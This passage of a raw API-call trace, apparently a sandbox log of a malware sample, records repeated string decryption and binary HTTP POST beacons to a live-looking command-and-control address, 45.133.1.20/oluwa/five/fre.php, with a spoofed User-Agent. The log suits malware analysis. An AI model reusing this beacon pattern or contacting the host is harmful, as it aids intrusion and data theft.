hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0200.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.881] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0200.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.882] CryptDestroyKey (hKey=0x6ad520) returned 1 [0200.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0200.883] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0200.883] GetProcessHeap () returned 0x6a0000 [0200.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0200.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.884] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0200.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.885] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0200.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.886] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0200.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0200.925] GetProcessHeap () returned 0x6a0000 [0200.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0200.925] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0200.925] GetProcessHeap () returned 0x6a0000 [0200.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0200.925] socket (af=2, type=1, protocol=6) returned 0x538 [0200.926] connect (s=0x538, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0200.954] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0200.954] GetProcessHeap () returned 0x6a0000 [0200.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0200.955] GetProcessHeap () returned 0x6a0000 [0200.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0200.955] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.956] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.957] GetProcessHeap () returned 0x6a0000 [0200.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0200.957] GetProcessHeap () returned 0x6a0000 [0200.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.957] GetProcessHeap () returned 0x6a0000 [0200.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0200.957] GetProcessHeap () returned 0x6a0000 [0200.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0200.958] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0200.959] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.959] GetProcessHeap () returned 0x6a0000 [0200.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0200.959] GetProcessHeap () returned 0x6a0000 [0200.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0200.960] send (s=0x538, buf=0x6b5c98*, len=242, flags=0) returned 242 [0200.961] send (s=0x538, buf=0x6bb998*, len=159, flags=0) returned 159 [0200.961] GetProcessHeap () returned 0x6a0000 [0200.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0200.961] recv (in: s=0x538, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0201.097] GetProcessHeap () returned 0x6a0000 [0201.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0201.097] GetProcessHeap () returned 0x6a0000 [0201.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0201.098] GetProcessHeap () returned 0x6a0000 [0201.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0201.098] GetProcessHeap () returned 0x6a0000 [0201.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0201.098] closesocket (s=0x538) returned 0 [0201.099] GetProcessHeap () returned 0x6a0000 [0201.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0201.099] GetProcessHeap () returned 0x6a0000 [0201.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.099] GetProcessHeap () returned 0x6a0000 [0201.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0201.099] GetProcessHeap () returned 0x6a0000 [0201.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0201.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x928) returned 0x538 [0201.112] Sleep (dwMilliseconds=0xea60) [0201.115] GetProcessHeap () returned 0x6a0000 [0201.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0201.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.116] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0201.140] GetProcessHeap () returned 0x6a0000 [0201.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0201.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.141] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.143] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.144] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.144] GetProcessHeap () returned 0x6a0000 [0201.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0201.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.149] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0201.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.160] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.161] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0201.161] GetProcessHeap () returned 0x6a0000 [0201.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.163] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.169] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.169] GetProcessHeap () returned 0x6a0000 [0201.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0201.169] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.170] GetProcessHeap () returned 0x6a0000 [0201.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0201.171] GetProcessHeap () returned 0x6a0000 [0201.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.171] GetProcessHeap () returned 0x6a0000 [0201.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0201.171] GetProcessHeap () returned 0x6a0000 [0201.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0201.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0201.187] GetProcessHeap () returned 0x6a0000 [0201.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0201.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.189] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0201.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.192] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.193] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.193] GetProcessHeap () returned 0x6a0000 [0201.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0201.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.195] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0201.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.196] CryptDestroyKey (hKey=0x6ad020) returned 1 [0201.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.196] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0201.197] GetProcessHeap () returned 0x6a0000 [0201.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.197] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0201.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.198] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0201.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.199] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0201.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.203] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0201.203] GetProcessHeap () returned 0x6a0000 [0201.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0201.203] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0201.203] GetProcessHeap () returned 0x6a0000 [0201.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0201.204] socket (af=2, type=1, protocol=6) returned 0x53c [0201.204] connect (s=0x53c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0201.231] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0201.231] GetProcessHeap () returned 0x6a0000 [0201.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0201.231] GetProcessHeap () returned 0x6a0000 [0201.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0201.232] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.234] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0201.234] GetProcessHeap () returned 0x6a0000 [0201.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0201.234] GetProcessHeap () returned 0x6a0000 [0201.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.236] GetProcessHeap () returned 0x6a0000 [0201.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0201.236] GetProcessHeap () returned 0x6a0000 [0201.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0201.237] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.238] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0201.238] GetProcessHeap () returned 0x6a0000 [0201.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0201.238] GetProcessHeap () returned 0x6a0000 [0201.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.238] send (s=0x53c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0201.280] send (s=0x53c, buf=0x6bb998*, len=159, flags=0) returned 159 [0201.280] GetProcessHeap () returned 0x6a0000 [0201.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0201.280] recv (in: s=0x53c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0201.330] GetProcessHeap () returned 0x6a0000 [0201.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0201.332] GetProcessHeap () returned 0x6a0000 [0201.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0201.334] GetProcessHeap () returned 0x6a0000 [0201.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0201.334] GetProcessHeap () returned 0x6a0000 [0201.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0201.334] closesocket (s=0x53c) returned 0 [0201.335] GetProcessHeap () returned 0x6a0000 [0201.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0201.335] GetProcessHeap () returned 0x6a0000 [0201.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.335] GetProcessHeap () returned 0x6a0000 [0201.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0201.336] GetProcessHeap () returned 0x6a0000 [0201.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0201.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x934) returned 0x53c [0201.338] Sleep (dwMilliseconds=0xea60) [0201.340] GetProcessHeap () returned 0x6a0000 [0201.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0201.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0201.361] GetProcessHeap () returned 0x6a0000 [0201.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0201.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.362] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.364] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.366] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.367] GetProcessHeap () returned 0x6a0000 [0201.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0201.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.368] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0201.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.370] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.371] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0201.379] GetProcessHeap () returned 0x6a0000 [0201.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.382] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.383] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.384] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.384] GetProcessHeap () returned 0x6a0000 [0201.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0201.384] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.385] GetProcessHeap () returned 0x6a0000 [0201.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0201.385] GetProcessHeap () returned 0x6a0000 [0201.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.386] GetProcessHeap () returned 0x6a0000 [0201.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0201.386] GetProcessHeap () returned 0x6a0000 [0201.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0201.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.393] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0201.405] GetProcessHeap () returned 0x6a0000 [0201.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0201.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.406] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.407] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.408] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.408] GetProcessHeap () returned 0x6a0000 [0201.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0201.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.413] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0201.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.414] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.416] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0201.416] GetProcessHeap () returned 0x6a0000 [0201.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0201.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.417] StrStrA 